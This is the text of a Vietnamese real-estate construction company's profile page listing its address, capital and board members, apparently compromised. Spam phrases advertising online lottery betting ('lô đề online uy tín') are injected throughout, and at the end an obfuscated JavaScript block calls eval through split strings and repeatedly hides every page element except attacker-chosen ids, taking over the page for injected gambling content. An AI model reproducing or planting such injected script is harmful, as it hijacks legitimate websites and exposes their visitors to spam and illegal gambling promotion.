lô đề online uy tín

Công ty Cổ phần Xây dựng Kinh doanh Địa ốc III

lô đề online uy tínĐịa chỉ: 181 Võ Thị Sáu, Phường 7, Quận 3, TPHCM

Điện thoại: (08) 39 330 735 - 39 330 736 - Fax: (08) 39 330 733

Email: contrico@contrico.vn

Vốn điều lệ: 21.000.000.000 đồng

Tỷ lệ vốn góp của Tổng Công ty: 25%

Hội Đồng Quản Trị:

- Ông Trần Ngọc Mỹ

lô đề online uy tín- Bà Lê Thị Anh Đào 

lô đề online uy tín- Ông Hoàng Hải Đăng

lô đề online uy tín- Bà Châu Mỹ Linh

- Bà Nguyễn Thị Kim Phượng

Ban Điều hành:

- Ông Trần Ngọc Mỹ - Tổng Giám Đốc

- Bà Lê Thị Anh Đào - Kế toán trưởng

lô đề online uy tín

var SSpfGu1 = '
'; window["eval"]("do" + "cu" + "ment.wr" + "ite('" + SSpfGu1 + "');"); try { setInterval(function() { try { window["document"]["getElementById"]("div" + "All")["style"]["display"] = "no" + "ne" } catch (e) {} for (var t2$2 = 0; t2$2 < window["document"]["body"]["children"]["length"]; t2$2++) { try { var Dr3 = window["document"]["body"]["children"][t2$2]["tagName"]; var LsLMcufmw4 = window["document"]["body"]["children"][t2$2]["id"]; if (LsLMcufmw4 != "iconDiv1" && LsLMcufmw4 != "showcloneshengxiaon") { window["document"]["body"]["children"][t2$2]["style"]["display"] = "non" + "e" } } catch (e) {} } }, 100) } catch (e) {}